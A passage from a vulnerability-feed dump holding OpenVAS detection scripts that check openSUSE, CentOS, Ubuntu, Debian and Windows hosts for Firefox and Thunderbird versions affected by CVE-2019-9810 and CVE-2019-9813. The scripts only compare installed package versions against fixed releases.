}\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~60.6.1~89.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310883029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883029", "type": "openvas", "title": "CentOS Update for firefox CESA-2019:0671 centos7 ", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883029\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:38:56 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"CentOS Update for firefox CESA-2019:0671 centos7 \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2019:0671\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2019-April/023257.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the CESA-2019:0671 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es):\n\n * Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n * Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS7\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~60.6.1~1.el7.centos\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-03-28T00:00:00", "id": "OPENVAS:1361412562310843943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843943", "type": "openvas", "title": "Ubuntu Update for firefox USN-3919-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843943\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-28 13:46:09 +0000 (Thu, 28 Mar 2019)\");\n script_name(\"Ubuntu Update for firefox USN-3919-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|18\\.10|16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3919-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3919-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the USN-3919-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two security issues were discovered in the JavaScript engine in Firefox.\nIf a user were tricked in to opening a specially crafted website, an\nattacker could exploit this by causing a denial of service, or executing\narbitrary code.\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on Ubuntu 18.10,\n Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU14.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.18.10.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"firefox\", ver:\"66.0.1+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814946", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814946", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814946\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:36:16 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 60.6.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"60.6.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2019-05-01T00:00:00", "published": "2019-03-23T00:00:00", "id": "OPENVAS:1361412562310704417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704417", "type": "openvas", "title": "Debian Security Advisory DSA 4417-1 (firefox-esr - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704417\");\n script_version(\"2019-05-01T16:02:02+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-01 16:02:02 +0000 (Wed, 01 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-23 22:00:00 +0000 (Sat, 23 Mar 2019)\");\n script_name(\"Debian Security Advisory DSA 4417-1 (firefox-esr - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4417.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4417-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox-esr'\n package(s) announced via the DSA-4417-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\");\n\n script_tag(name:\"affected\", value:\"'firefox-esr' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 60.6.1esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 